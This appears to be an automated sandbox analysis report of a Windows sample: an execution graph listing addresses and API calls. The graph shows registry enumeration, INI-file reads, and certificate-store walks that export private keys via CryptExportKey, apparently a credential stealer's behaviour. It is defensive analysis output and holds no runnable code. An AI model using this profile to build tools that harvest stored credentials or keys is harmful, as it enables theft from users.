                                        • Instruction ID: eed670ac18b967e62f7e4a33f07424a6f070af35b6b4aa073188ea672a5206ba
                                        • Opcode Fuzzy Hash: 203fa3779de82baab59e6dea5f7548544cbb6c1dbaa0a6f739c5715a9f5a3d1f
                                        • Instruction Fuzzy Hash: FCF0907290CB10ABD671BB689803B5E76D0AF07B20F1541C9F401AB6D2CF745F40DA5A

                                        Execution Graph

                                        Execution Coverage:21.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:12.1%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:36
                                        execution_graph 10786 40f950 10787 40f958 10786->10787 10790 40f731 10787->10790 10789 40f97e 10791 40f742 10790->10791 10792 40f743 GetPEB 10790->10792 10791->10789 10795 40f765 10792->10795 10793 40f833 10793->10789 10795->10793 10877 402251 10795->10877 10881 4074bf 10795->10881 10891 40eebe 10795->10891 10905 40443e 10795->10905 10931 40ae3d 10795->10931 10935 409cbb 10795->10935 10943 4078b9 10795->10943 10963 40c7b5 10795->10963 10973 40e732 10795->10973 10999 40542e 10795->10999 11039 40e42a 10795->11039 11043 40c02a 10795->11043 11047 407ca3 10795->11047 11057 40c99f 10795->11057 11071 40649f 10795->11071 11075 406b1d 10795->11075 11079 40681c 10795->11079 11091 40c51b 10795->11091 11099 40691a 10795->11099 11103 40ca19 10795->11103 11107 407198 10795->11107 11113 40c117 10795->11113 11117 40c594 10795->11117 11125 404a92 10795->11125 11197 40a091 10795->11197 11203 40758e 10795->11203 11211 40dd8d 10795->11211 11221 40768d 10795->11221 11235 40620d 10795->11235 11239 40590c 10795->11239 11273 404e8c 10795->11273 11301 405f8c 10795->11301 11313 407d0b 10795->11313 11317 405b0b 10795->11317 11355 405c8a 10795->11355 11363 408d89 10795->11363 11375 40da09 10795->11375 11381 40d185 10795->11381 11391 409c05 10795->11391 11406 40c884 10795->11406 11429 405204 10795->11429 11456 409b7e 10795->11456 11464 408a7d 10795->11464 11497 40e6fc 10795->11497 11501 409ffc 10795->11501 11511 40c179 10795->11511 11515 40e3f9 10795->11515 11519 40bff9 10795->11519 11523 40def8 10795->11523 11527 40e274 10795->11527 11537 40e96e 10795->11537 11545 40f56b 10795->11545 11571 40d1e9 10795->11571 11593 40c0e6 10795->11593 11597 40e2e2 10795->11597 11601 4067e1 10795->11601 11605 407f5e 10795->11605 11611 409edc 10795->11611 11624 40c05b 10795->11624 11636 407c5a 10795->11636 11642 40ecd9 10795->11642 11648 408e59 10795->11648 11656 406756 10795->11656 11666 40a056 10795->11666 11670 4048d6 10795->11670 11684 40a8d3 10795->11684 11692 40da52 10795->11692 11696 409e50 10795->11696 11710 406b4e 10795->11710 11714 40c64e 10795->11714 11745 40d7cc 10795->11745 11755 40f64a 10795->11755 11767 409dc9 10795->11767 11775 40c148 10795->11775 11779 40dcc6 10795->11779 11785 40e6c6 10795->11785 11789 40cdc6 10795->11789 11799 405d45 10795->11799 11805 4073c3 10795->11805 11811 409d42 10795->11811 11819 40d5c1 10795->11819 11823 406ec0 10795->11823 10878 40225a 10877->10878 10879 402266 10878->10879 11865 4018a0 10878->11865 10879->10795 10882 4074d1 10881->10882 11868 40740c RegOpenKeyA 10882->11868 10885 40740c 9 API calls 10886 4074f9 10885->10886 10887 40740c 9 API calls 10886->10887 10888 40750c 10887->10888 10889 40740c 9 API calls 10888->10889 10890 40751e 10889->10890 10890->10795 10892 40eed0 10891->10892 11895 4041dd 10892->11895 10895 4041dd 46 API calls 10896 40ef01 10895->10896 10897 4041dd 46 API calls 10896->10897 10898 40ef18 10897->10898 10899 4041dd 46 API calls 10898->10899 10900 40ef2f 10899->10900 11902 40ed97 10900->11902 10906 404455 10905->10906 10907 404476 GetVersionExA 10906->10907 10908 404498 10907->10908 12155 4042ab GetModuleHandleA 10908->12155 10910 4044de 12161 4018b7 LocalAlloc 10910->12161 10912 4044f1 GetLocaleInfoA 12162 401587 10912->12162 10914 404520 GetLocaleInfoA 10915 404549 10914->10915 12164 404313 10915->12164 10917 40454e 12172 4043ad 10917->12172 10932 40ae4f 10931->10932 12232 40ad02 RegOpenKeyA 10932->12232 10934 40ae5f 10934->10795 12323 4015d8 10935->12323 10937 409cd0 GetCurrentDirectoryA 12325 409a76 StrStrIA 10937->12325 10940 409a76 83 API calls 10941 409d27 SetCurrentDirectoryA 10940->10941 10942 409d3e 10941->10942 10942->10795 10958 4078cd 10943->10958 10944 4079a0 12549 40786d 10944->12549 10945 4078e5 StrStrA 10947 407942 StrStrIA 10945->10947 10945->10958 10947->10958 10949 4078fe lstrlenA 10952 402272 9 API calls 10949->10952 10950 40786d 46 API calls 10953 4079b4 10950->10953 10951 402272 9 API calls 10951->10958 10952->10958 10955 40786d 46 API calls 10953->10955 10954 404192 41 API calls 10954->10958 10956 4079be 10955->10956 12560 407702 RegOpenKeyA 10956->12560 10958->10944 10958->10945 10958->10949 10958->10951 10958->10954 10960 4018a0 LocalFree 10958->10960 10960->10958 10961 407702 48 API calls 10962 4079e3 10961->10962 10962->10795 10964 40c7c7 10963->10964 10965 401bb8 6 API calls 10964->10965 10966 40c7dd 10965->10966 10967 40c804 10966->10967 10968 402272 9 API calls 10966->10968 10967->10795 10969 40c7e7 10968->10969 10969->10967 10970 404192 41 API calls 10969->10970 10971 40c7ff 10970->10971 10972 4018a0 LocalFree 10971->10972 10972->10967 10974 40e744 10973->10974 10975 401bb8 6 API calls 10974->10975 10976 40e75e 10975->10976 10977 40e77b 10976->10977 10978 404192 41 API calls 10976->10978 10979 401bb8 6 API calls 10977->10979 10980 40e776 10978->10980 10981 40e791 10979->10981 10982 4018a0 LocalFree 10980->10982 10983 40e7ae 10981->10983 10985 404192 41 API calls 10981->10985 10982->10977 10984 401bb8 6 API calls 10983->10984 10986 40e7c5 10984->10986 10987 40e7a9 10985->10987 10988 40e7e2 10986->10988 10990 404192 41 API calls 10986->10990 10989 4018a0 LocalFree 10987->10989 10991 401bb8 6 API calls 10988->10991 10989->10983 10992 40e7dd 10990->10992 10993 40e7f8 10991->10993 10994 4018a0 LocalFree 10992->10994 10995 40e815 10993->10995 10996 404192 41 API calls 10993->10996 10994->10988 10995->10795 10997 40e810 10996->10997 10998 4018a0 LocalFree 10997->10998 10998->10995 11000 405440 10999->11000 12571 405309 11000->12571 11003 405309 24 API calls 11004 405473 11003->11004 11005 405309 24 API calls 11004->11005 11006 40548b 11005->11006 11007 405309 24 API calls 11006->11007 11008 4054a3 11007->11008 11009 405309 24 API calls 11008->11009 11010 4054bb 11009->11010 11011 405309 24 API calls 11010->11011 11012 4054d3 11011->11012 11013 405309 24 API calls 11012->11013 11014 4054eb 11013->11014 11015 405309 24 API calls 11014->11015 11016 405503 11015->11016 11017 405309 24 API calls 11016->11017 11040 40e43c 11039->11040 11041 4041dd 46 API calls 11040->11041 11042 40e456 11041->11042 11042->10795 11044 40c03c 11043->11044 12618 40bf68 11044->12618 11046 40c04c 11046->10795 11048 4015d8 11047->11048 11049 407cb8 GetWindowsDirectoryA 11048->11049 11050 407cd0 11049->11050 11052 407cfc 11049->11052 11051 401c3f 5 API calls 11050->11051 11050->11052 11053 407ce8 11051->11053 11052->10795 11054 403ead 16 API calls 11053->11054 11055 407cf7 11054->11055 11056 4018a0 LocalFree 11055->11056 11056->11052 11058 40c9b1 11057->11058 11059 401bb8 6 API calls 11058->11059 11060 40c9c7 11059->11060 11061 40c9cb StrStrIA 11060->11061 11064 40ca0a 11060->11064 11062 40ca02 11061->11062 11063 40c9df 11061->11063 11066 4018a0 LocalFree 11062->11066 11065 402272 9 API calls 11063->11065 11064->10795 11067 40c9e7 11065->11067 11066->11064 11068 403fe7 41 API calls 11067->11068 11069 40c9fd 11068->11069 11070 4018a0 LocalFree 11069->11070 11070->11062 11072 4064b1 11071->11072 12640 40623e RegOpenKeyA 11072->12640 11074 4064c1 11074->10795 11076 406b2f 11075->11076 12651 406955 RegOpenKeyA 11076->12651 11078 406b3f 11078->10795 11080 40682e 11079->11080 11081 4041dd 46 API calls 11080->11081 11082 406848 11081->11082 11083 401bb8 6 API calls 11082->11083 11084 40685f 11083->11084 11085 406887 11084->11085 11086 401c93 6 API calls 11084->11086 11085->10795 11087 40686e 11086->11087 11088 404192 41 API calls 11087->11088 11089 406882 11088->11089 11090 4018a0 LocalFree 11089->11090 11090->11085 11092 40c52d 11091->11092 12661 40c4aa 11092->12661 11095 40c4aa 46 API calls 11096 40c544 11095->11096 11097 40c4aa 46 API calls 11096->11097 11098 40c54e 11097->11098 11098->10795 11100 40692c 11099->11100 11101 4041dd 46 API calls 11100->11101 11102 406946 11101->11102 11102->10795 11104 40ca2b 11103->11104 11105 4041dd 46 API calls 11104->11105 11106 40ca45 11105->11106 11106->10795 11108 4071aa 11107->11108 12678 406fb6 RegOpenKeyA 11108->12678 11111 406fb6 14 API calls 11112 4071d2 11111->11112 11112->10795 11114 40c129 11113->11114 11115 40bf68 46 API calls 11114->11115 11116 40c139 11115->11116 11116->10795 11118 40c5a6 11117->11118 12689 40c55d 11118->12689 11121 40c55d 46 API calls 11122 40c5bd 11121->11122 11123 40c55d 46 API calls 11122->11123 11124 40c5c7 11123->11124 11124->10795 11126 404aa4 11125->11126 12698 4018b7 LocalAlloc 11126->12698 11128 404ab1 GetWindowsDirectoryA 11129 404ac5 11128->11129 11130 404ad9 11128->11130 11129->11130 11131 404acc 11129->11131 11132 4018a0 LocalFree 11130->11132 12699 40495f 11131->12699 11134 404ad7 11132->11134 11135 401cf8 7 API calls 11134->11135 11136 404ae8 11135->11136 11137 40495f 28 API calls 11136->11137 11138 404af1 11137->11138 11139 401cf8 7 API calls 11138->11139 11140 404af8 11139->11140 11141 404b10 11140->11141 11143 401c93 6 API calls 11140->11143 11142 401cf8 7 API calls 11141->11142 11144 404b17 11142->11144 11145 404b07 11143->11145 11146 404b2f 11144->11146 11148 401c93 6 API calls 11144->11148 11147 40495f 28 API calls 11145->11147 11149 401cf8 7 API calls 11146->11149 11147->11141 11150 404b26 11148->11150 11151 404b36 11149->11151 11152 40495f 28 API calls 11150->11152 11153 404b4e 11151->11153 11154 401c93 6 API calls 11151->11154 11152->11146 11155 401bb8 6 API calls 11153->11155 11157 404b45 11154->11157 11198 40a0a3 11197->11198 11199 4041dd 46 API calls 11198->11199 11200 40a0bd 11199->11200 11201 4041dd 46 API calls 11200->11201 11202 40a0d4 11201->11202 11202->10795 11204 4075a0 11203->11204 12754 40752d 11204->12754 11207 40752d 46 API calls 11208 4075b7 11207->11208 11209 40752d 46 API calls 11208->11209 11210 4075c1 11209->11210 11210->10795 11212 40dd9f 11211->11212 11213 401bb8 6 API calls 11212->11213 11215 40ddb9 11213->11215 11214 40ddd6 11217 4041dd 46 API calls 11214->11217 11215->11214 11216 404192 41 API calls 11215->11216 11218 40ddd1 11216->11218 11219 40dded 11217->11219 11220 4018a0 LocalFree 11218->11220 11219->10795 11220->11214 11222 40769f 11221->11222 12767 4075d0 11222->12767 11225 4075d0 29 API calls 11226 4076ba 11225->11226 11227 4075d0 29 API calls 11226->11227 11228 4076c6 11227->11228 11229 4075d0 29 API calls 11228->11229 11230 4076d5 11229->11230 11231 4075d0 29 API calls 11230->11231 11232 4076e4 11231->11232 11233 4075d0 29 API calls 11232->11233 11234 4076f3 11233->11234 11234->10795 11236 40621f 11235->11236 12798 406025 RegOpenKeyA 11236->12798 11238 40622f 11238->10795 11240 40591e 11239->11240 12809 4057e5 11240->12809 11274 4015d8 11273->11274 11275 404ea1 GetWindowsDirectoryA 11274->11275 11276 404f60 11275->11276 11278 404ebd 11275->11278 11277 401cf8 7 API calls 11276->11277 11279 404f67 11277->11279 11278->11276 11280 401c3f 5 API calls 11278->11280 11281 404f87 11279->11281 11283 401c93 6 API calls 11279->11283 11282 404ed9 GetPrivateProfileStringA 11280->11282 12917 404e40 11281->12917 11284 404f09 11282->11284 11285 404f1a GetPrivateProfileStringA 11282->11285 11287 404f76 11283->11287 11288 404cb4 31 API calls 11284->11288 11290 404f44 11285->11290 11291 404f55 11285->11291 12889 404cb4 11287->12889 11288->11285 11294 404cb4 31 API calls 11290->11294 11295 4018a0 LocalFree 11291->11295 11293 404e40 36 API calls 11297 404fa5 11293->11297 11294->11291 11295->11276 11299 404e40 36 API calls 11297->11299 11298 4018a0 LocalFree 11298->11281 11300 404fb4 11299->11300 11300->10795 11302 405f9e 11301->11302 11303 401bb8 6 API calls 11302->11303 11306 405fba 11303->11306 11304 405fd5 11305 401bb8 6 API calls 11304->11305 11311 405fee 11305->11311 11306->11304 11307 4018a0 LocalFree 11306->11307 11307->11304 11308 406009 12931 405d8d RegOpenKeyA 11308->12931 11310 406016 11310->10795 11311->11308 11312 4018a0 LocalFree 11311->11312 11312->11308 11314 407d1d 11313->11314 11315 4041dd 46 API calls 11314->11315 11316 407d37 11315->11316 11316->10795 11318 405b1d 11317->11318 11319 401bb8 6 API calls 11318->11319 11320 405b37 11319->11320 11321 405b4f 11320->11321 11323 403ead 16 API calls 11320->11323 11322 401bb8 6 API calls 11321->11322 11324 405b66 11322->11324 11325 405b4a 11323->11325 11326 405b7e 11324->11326 11328 403ead 16 API calls 11324->11328 11327 4018a0 LocalFree 11325->11327 11329 401bb8 6 API calls 11326->11329 11327->11321 11330 405b79 11328->11330 11333 405b95 11329->11333 11331 4018a0 LocalFree 11330->11331 11331->11326 11332 405ba8 11335 401bb8 6 API calls 11332->11335 11333->11332 12950 405aad 11333->12950 11337 405bbf 11335->11337 11338 405bd2 11337->11338 11340 405aad 41 API calls 11337->11340 11341 401bb8 6 API calls 11338->11341 11339 4018a0 LocalFree 11339->11332 11342 405bcd 11340->11342 11343 405be9 11341->11343 11344 4018a0 LocalFree 11342->11344 11345 405bfc 11343->11345 11346 405aad 41 API calls 11343->11346 11344->11338 12941 405ade 11345->12941 11348 405bf7 11346->11348 11350 4018a0 LocalFree 11348->11350 11350->11345 11356 405c9c 11355->11356 12955 405c29 11356->12955 11359 405c29 46 API calls 11360 405cb3 11359->11360 11361 405c29 46 API calls 11360->11361 11362 405cbd 11361->11362 11362->10795 11364 408d9b 11363->11364 11365 4041dd 46 API calls 11364->11365 11366 408db5 11365->11366 12968 408b58 RegOpenKeyA 11366->12968 11369 408b58 14 API calls 11370 408dda 11369->11370 12979 408c47 RegOpenKeyA 11370->12979 11373 408c47 53 API calls 11374 408dfe 11373->11374 11374->10795 11376 40da1b 11375->11376 12998 40d825 RegOpenKeyA 11376->12998 11379 40d825 14 API calls 11380 40da43 11379->11380 11380->10795 11382 40d197 11381->11382 13009 40ce9d RegOpenKeyA 11382->13009 11385 40ce9d 16 API calls 11386 40d1bf 11385->11386 13021 40d0f6 11386->13021 11389 40d0f6 21 API calls 11390 40d1da 11389->11390 11390->10795 11392 409c1a 11391->11392 11393 401cf8 7 API calls 11392->11393 11394 409c24 11393->11394 11395 409c4c GetCurrentDirectoryA 11394->11395 11396 401c93 6 API calls 11394->11396 11397 409a76 83 API calls 11395->11397 11398 409c33 11396->11398 11399 409c84 11397->11399 11401 404192 41 API calls 11398->11401 11400 409a76 83 API calls 11399->11400 11402 409ca0 SetCurrentDirectoryA 11400->11402 11403 409c47 11401->11403 11404 409cb7 11402->11404 11405 4018a0 LocalFree 11403->11405 11404->10795 11405->11395 11414 40c897 11406->11414 11407 40c8e5 11409 401cf8 7 API calls 11407->11409 11408 40c8a5 StrStrIA 11408->11414 11411 40c8ec 11409->11411 11410 402272 9 API calls 11410->11414 11412 40c914 11411->11412 11415 401c93 6 API calls 11411->11415 11413 401cf8 7 API calls 11412->11413 11416 40c91b 11413->11416 11414->11407 11414->11408 11414->11410 11417 404192 41 API calls 11414->11417 11422 4018a0 LocalFree 11414->11422 11418 40c8fb 11415->11418 11421 401c93 6 API calls 11416->11421 11425 40c943 11416->11425 11417->11414 11419 404192 41 API calls 11418->11419 11420 40c90f 11419->11420 11423 4018a0 LocalFree 11420->11423 11424 40c92a 11421->11424 11422->11414 11423->11412 11426 404192 41 API calls 11424->11426 11425->10795 11427 40c93e 11426->11427 11428 4018a0 LocalFree 11427->11428 11428->11425 11433 405217 11429->11433 11430 405260 13037 40515b 11430->13037 11431 405225 StrStrIA 11431->11433 11433->11430 11433->11431 11435 402272 9 API calls 11433->11435 11442 4018a0 LocalFree 11433->11442 13071 405024 11433->13071 11435->11433 11436 40515b 34 API calls 11437 405274 11436->11437 11438 40515b 34 API calls 11437->11438 11440 40527e 11438->11440 11441 40515b 34 API calls 11440->11441 11443 405288 11441->11443 11442->11433 13066 404fda 11443->13066 11446 404fda 6 API calls 11447 4052a2 11446->11447 11448 404fda 6 API calls 11447->11448 11449 4052af 11448->11449 11457 4015d8 11456->11457 11458 409b93 GetCurrentDirectoryA 11457->11458 11459 409a76 83 API calls 11458->11459 11460 409bce 11459->11460 11461 409a76 83 API calls 11460->11461 11462 409bea SetCurrentDirectoryA 11461->11462 11463 409c01 11462->11463 11463->10795 11465 408a8f 11464->11465 13098 408a5b 11465->13098 11468 408a5b 49 API calls 11469 408aa6 11468->11469 11470 408a5b 49 API calls 11469->11470 11471 408ab0 11470->11471 11472 401bb8 6 API calls 11471->11472 11473 408ac7 11472->11473 11474 408acb 11473->11474 11475 408adf 11473->11475 13105 40879b 11474->13105 11476 401bb8 6 API calls 11475->11476 11478 408af6 11476->11478 11480 408afa 11478->11480 11481 408b0e 11478->11481 11483 40879b 38 API calls 11480->11483 11484 401bb8 6 API calls 11481->11484 11482 4018a0 LocalFree 11482->11475 11485 408b09 11483->11485 11486 408b21 11484->11486 11487 4018a0 LocalFree 11485->11487 11488 408b49 11486->11488 11489 402272 9 API calls 11486->11489 11487->11481 11488->10795 11490 408b2c 11489->11490 11491 408b30 11490->11491 11492 408b44 11490->11492 11498 40e70e 11497->11498 13238 40e688 11498->13238 11500 40e723 11500->10795 11502 40a00e 11501->11502 11503 401bb8 6 API calls 11502->11503 11504 40a024 11503->11504 11505 40a047 11504->11505 11506 402272 9 API calls 11504->11506 11505->10795 11507 40a02e 11506->11507 11508 404192 41 API calls 11507->11508 11509 40a042 11508->11509 11510 4018a0 LocalFree 11509->11510 11510->11505 11512 40c18b 11511->11512 11513 40bf68 46 API calls 11512->11513 11514 40c19b 11513->11514 11514->10795 11516 40e40b 11515->11516 13261 40e391 11516->13261 11518 40e41b 11518->10795 11520 40c00b 11519->11520 11521 40bf68 46 API calls 11520->11521 11522 40c01b 11521->11522 11522->10795 11524 40df0a 11523->11524 11525 40bf68 46 API calls 11524->11525 11526 40df1a 11525->11526 11526->10795 11528 40e286 11527->11528 13273 40e062 RegOpenKeyA 11528->13273 11531 40e062 11 API calls 11532 40e2ae 11531->11532 13306 40e1ab RegOpenKeyA 11532->13306 11535 40e1ab 31 API calls 11536 40e2d3 11535->11536 11536->10795 11538 40e980 11537->11538 13341 40e824 11538->13341 11541 40e824 49 API calls 11542 40e9a8 11541->11542 11543 4041dd 46 API calls 11542->11543 11544 40e9bf 11543->11544 11544->10795 11546 40f57d 11545->11546 13359 40f519 11546->13359 11551 401c3f 5 API calls 11552 40f5aa 11551->11552 13373 40f1d7 RegOpenKeyA 11552->13373 11555 4018a0 LocalFree 11556 40f5c4 11555->11556 11557 401bb8 6 API calls 11556->11557 11558 40f5da 11557->11558 11559 40f5fe 11558->11559 11560 401c93 6 API calls 11558->11560 11561 40f138 23 API calls 11559->11561 11562 40f5e9 11560->11562 11563 40f611 11561->11563 11564 40f138 23 API calls 11562->11564 11565 40f1d7 26 API calls 11563->11565 11566 40f5f9 11564->11566 11567 40f626 11565->11567 11568 4018a0 LocalFree 11566->11568 11569 40f1d7 26 API calls 11567->11569 11568->11559 11570 40f63b 11569->11570 11570->10795 11573 40d1fd 11571->11573 11572 40d3da 11572->10795 11573->11572 11574 40d268 CertOpenSystemStoreA 11573->11574 11574->11572 11581 40d282 11574->11581 11575 40d284 CertEnumCertificatesInStore 11576 40d294 CertCloseStore 11575->11576 11575->11581 11576->11572 11578 40d2b2 lstrcmpA 11578->11581 11580 40d2e9 lstrcmpA 11580->11581 11582 40d2fe CryptAcquireCertificatePrivateKey 11580->11582 11581->11575 11581->11578 11581->11580 11583 4018a0 LocalFree 11581->11583 13445 4018b7 LocalAlloc 11581->13445 11582->11581 11584 40d31b CryptGetUserKey 11582->11584 11583->11581 11585 40d3a7 CryptReleaseContext 11584->11585 11586 40d32f CryptExportKey 11584->11586 11585->11581 11587 40d348 11586->11587 11588 40d39e CryptDestroyKey 11586->11588 13446 4018b7 LocalAlloc 11587->13446 11588->11585 11590 40d350 CryptExportKey 11591 40d36d 11590->11591 11592 4018a0 LocalFree 11591->11592 11592->11588 11594 40c0f8 11593->11594 11595 40bf68 46 API calls 11594->11595 11596 40c108 11595->11596 11596->10795 11598 40e2f4 11597->11598 11599 40bf68 46 API calls 11598->11599 11600 40e304 11599->11600 11600->10795 11602 4067f3 11601->11602 11603 4041dd 46 API calls 11602->11603 11604 40680d 11603->11604 11604->10795 11606 407f70 11605->11606 13447 407d46 RegOpenKeyA 11606->13447 11609 407d46 14 API calls 11610 407f98 11609->11610 11610->10795 11612 409ef0 11611->11612 11613 401cf8 7 API calls 11612->11613 11614 409efa 11613->11614 11615 404192 41 API calls 11614->11615 11619 409f17 11614->11619 11618 409f12 11615->11618 11616 409f28 StrStrIA 11616->11619 11617 409f6d 11617->10795 11620 4018a0 LocalFree 11618->11620 11619->11616 11619->11617 11621 402272 9 API calls 11619->11621 11622 404192 41 API calls 11619->11622 11623 4018a0 LocalFree 11619->11623 11620->11619 11621->11619 11622->11619 11623->11619 11625 40c06d 11624->11625 11626 40bf68 46 API calls 11625->11626 11627 40c07d 11626->11627 11628 401bb8 6 API calls 11627->11628 11629 40c094 11628->11629 11630 403fe7 41 API calls 11629->11630 11632 40c0d7 11629->11632 11631 40c0b5 11630->11631 11633 403fe7 41 API calls 11631->11633 11632->10795 11634 40c0cf 11633->11634 11635 4018a0 LocalFree 11634->11635 11635->11632 11637 407c6c 11636->11637 13458 4079f4 RegOpenKeyA 11637->13458 11640 4079f4 14 API calls 11641 407c94 11640->11641 11641->10795 11643 40eceb 11642->11643 13469 40e9ce RegOpenKeyA 11643->13469 11646 40e9ce 18 API calls 11647 40ed13 11646->11647 11647->10795 11649 408e6b 11648->11649 13481 408e0d 11649->13481 11652 408e0d 46 API calls 11653 408e82 11652->11653 11654 408e0d 46 API calls 11653->11654 11655 408e8c 11654->11655 11655->10795 11657 406768 11656->11657 11658 4041dd 46 API calls 11657->11658 11659 406782 11658->11659 11660 401bb8 6 API calls 11659->11660 11664 40679b 11660->11664 11661 4067c5 13492 4064d0 RegOpenKeyA 11661->13492 11663 4067d2 11663->10795 11664->11661 11665 4018a0 LocalFree 11664->11665 11665->11661 11667 40a068 11666->11667 11668 4041dd 46 API calls 11667->11668 11669 40a082 11668->11669 11669->10795 11671 4048e8 11670->11671 13504 40475c RegOpenKeyA 11671->13504 11674 40475c 14 API calls 11675 404905 11674->11675 11676 40475c 14 API calls 11675->11676 11677 404912 11676->11677 13515 40464e RegOpenKeyA 11677->13515 11680 40464e 10 API calls 11681 40492c 11680->11681 11682 40464e 10 API calls 11681->11682 11683 404939 11682->11683 11683->10795 11690 40a8e5 11684->11690 11685 40a90b 13524 40a6af CoCreateInstance 11685->13524 11689 40a940 11689->10795 11690->11685 11691 40a298 CoTaskMemFree 11690->11691 11691->11685 11693 40da64 11692->11693 11694 4041dd 46 API calls 11693->11694 11695 40da7e 11694->11695 11695->10795 11697 409e62 11696->11697 11698 401bb8 6 API calls 11697->11698 11699 409e7c 11698->11699 11700 409e99 11699->11700 11702 404192 41 API calls 11699->11702 11701 401bb8 6 API calls 11700->11701 11703 409eb0 11701->11703 11704 409e94 11702->11704 11705 409ecd 11703->11705 11707 404192 41 API calls 11703->11707 11706 4018a0 LocalFree 11704->11706 11705->10795 11706->11700 11708 409ec8 11707->11708 11709 4018a0 LocalFree 11708->11709 11709->11705 11711 406b60 11710->11711 11712 4041dd 46 API calls 11711->11712 11713 406b7a 11712->11713 11713->10795 11717 40c661 11714->11717 11715 40c6b6 11718 4041dd 46 API calls 11715->11718 11716 40c66f StrStrIA 11716->11717 11717->11715 11717->11716 11719 402272 9 API calls 11717->11719 11723 404192 41 API calls 11717->11723 11727 4018a0 LocalFree 11717->11727 11720 40c6cd 11718->11720 11719->11717 11721 401bb8 6 API calls 11720->11721 11722 40c6e4 11721->11722 11724 401bb8 6 API calls 11722->11724 11723->11717 11725 40c6fe 11724->11725 11726 401bb8 6 API calls 11725->11726 11728 40c718 11726->11728 11727->11717 11729 401bb8 6 API calls 11728->11729 11730 40c734 11729->11730 11736 4015b3 lstrlenA 11730->11736 11744 40c777 11730->11744 11731 4018a0 LocalFree 11732 40c78d 11731->11732 11733 4018a0 LocalFree 11732->11733 11734 40c795 11733->11734 11735 4018a0 LocalFree 11734->11735 11737 40c79d 11735->11737 11738 40c761 11736->11738 11739 4018a0 LocalFree 11737->11739 11740 4015b3 lstrlenA 11738->11740 11742 40c76c 11740->11742 11743 4015b3 lstrlenA 11742->11743 11743->11744 11744->11731 11746 40d7de 11745->11746 13570 40d790 11746->13570 11749 40d790 46 API calls 11750 40d7f5 11749->11750 11751 40d790 46 API calls 11750->11751 11752 40d7ff 11751->11752 11753 4041dd 46 API calls 11752->11753 11754 40d816 11753->11754 11754->10795 11756 4015d8 11755->11756 11757 40f65f GetCurrentDirectoryA 11756->11757 11758 409a76 83 API calls 11757->11758 11759 40f69a 11758->11759 11760 409a76 83 API calls 11759->11760 11761 40f6b6 SetCurrentDirectoryA GetCurrentDirectoryA 11760->11761 11762 409a76 83 API calls 11761->11762 11763 40f6fa 11762->11763 11764 409a76 83 API calls 11763->11764 11765 40f716 SetCurrentDirectoryA 11764->11765 11766 40f72d 11765->11766 11766->10795 11768 4015d8 11767->11768 11769 409dde GetCurrentDirectoryA 11768->11769 11770 409a76 83 API calls 11769->11770 11771 409e19 11770->11771 11772 409a76 83 API calls 11771->11772 11773 409e35 SetCurrentDirectoryA 11772->11773 11774 409e4c 11773->11774 11774->10795 11776 40c15a 11775->11776 11777 40bf68 46 API calls 11776->11777 11778 40c16a 11777->11778 11778->10795 11780 40dcd8 11779->11780 13579 40da8d RegOpenKeyA 11780->13579 11783 40da8d 14 API calls 11784 40dd00 11783->11784 11784->10795 11786 40e6d8 11785->11786 11787 40e688 46 API calls 11786->11787 11788 40e6ed 11787->11788 11788->10795 11790 40cdd8 11789->11790 13590 40cb05 11790->13590 11793 401cf8 7 API calls 11794 40cdea 11793->11794 11795 40ce0c 11794->11795 11796 403fe7 41 API calls 11794->11796 11795->10795 11797 40ce07 11796->11797 11798 4018a0 LocalFree 11797->11798 11798->11795 11800 405d57 11799->11800 13613 405ccc 11800->13613 11803 405ccc 46 API calls 11804 405d7e 11803->11804 11804->10795 11806 4073d5 11805->11806 13628 4071e1 RegOpenKeyA 11806->13628 11809 4071e1 14 API calls 11810 4073fd 11809->11810 11810->10795 11812 4015d8 11811->11812 11813 409d57 GetCurrentDirectoryA 11812->11813 11814 409a76 83 API calls 11813->11814 11815 409d92 11814->11815 11816 409a76 83 API calls 11815->11816 11817 409dae SetCurrentDirectoryA 11816->11817 11818 409dc5 11817->11818 11818->10795 11820 40d5d3 11819->11820 13639 40d3eb RegOpenKeyA 11820->13639 11822 40d5e3 11822->10795 11824 406ed2 11823->11824 13650 406b89 RegOpenKeyA 11824->13650 11827 401bb8 6 API calls 11828 406ef9 11827->11828 11829 406f17 11828->11829 11830 401c93 6 API calls 11828->11830 11831 401cf8 7 API calls 11829->11831 11832 406f08 11830->11832 11833 406f1e 11831->11833 11834 406df5 20 API calls 11832->11834 11835 406f47 11833->11835 11838 401c93 6 API calls 11833->11838 11837 406f12 11834->11837 11836 401cf8 7 API calls 11835->11836 11842 406f4e 11836->11842 11840 4018a0 LocalFree 11837->11840 11839 406f2d 11838->11839 11841 401c93 6 API calls 11839->11841 11840->11829 11844 406f38 11841->11844 11843 406f77 11842->11843 11846 401c93 6 API calls 11842->11846 11845 401cf8 7 API calls 11843->11845 13661 406df5 11844->13661 11848 406f7e 11845->11848 11849 406f5d 11846->11849 11851 406fa7 11848->11851 11854 401c93 6 API calls 11848->11854 11852 401c93 6 API calls 11849->11852 11850 406f42 11853 4018a0 LocalFree 11850->11853 11851->10795 11855 406f68 11852->11855 11853->11835 11856 406f8d 11854->11856 11857 406df5 20 API calls 11855->11857 11858 401c93 6 API calls 11856->11858 11859 406f72 11857->11859 11861 406f98 11858->11861 11860 4018a0 LocalFree 11859->11860 11860->11843 11862 406df5 20 API calls 11861->11862 11863 406fa2 11862->11863 11866 4018b1 11865->11866 11867 4018a9 LocalFree 11865->11867 11866->10878 11867->11866 11869 4074bb 11868->11869 11870 40742c 11868->11870 11869->10885 11871 407433 RegEnumValueA 11870->11871 11875 4018a0 LocalFree 11870->11875 11876 401bb8 11870->11876 11871->11870 11872 40745c RegCloseKey 11871->11872 11872->11869 11875->11870 11877 401bc4 11876->11877 11880 401ad4 11877->11880 11881 401ae2 RegOpenKeyExA 11880->11881 11883 401b91 11881->11883 11884 401b22 RegQueryValueExA 11881->11884 11885 401bb3 11883->11885 11888 401ad4 2 API calls 11883->11888 11886 401b89 RegCloseKey 11884->11886 11887 401b3d 11884->11887 11885->11870 11886->11883 11887->11886 11894 4018b7 LocalAlloc 11887->11894 11888->11885 11890 401b59 RegQueryValueExA 11891 401b73 11890->11891 11892 401b79 11890->11892 11893 4018a0 LocalFree 11891->11893 11892->11886 11893->11892 11894->11890 11930 4041ac 11895->11930 11898 4041ac 46 API calls 11899 404206 11898->11899 11900 4041ac 46 API calls 11899->11900 11901 404219 11900->11901 11901->10895 11939 401cf8 11930->11939 11933 4041d9 11933->11898 11938 4018a0 LocalFree 11938->11933 11959 4018b7 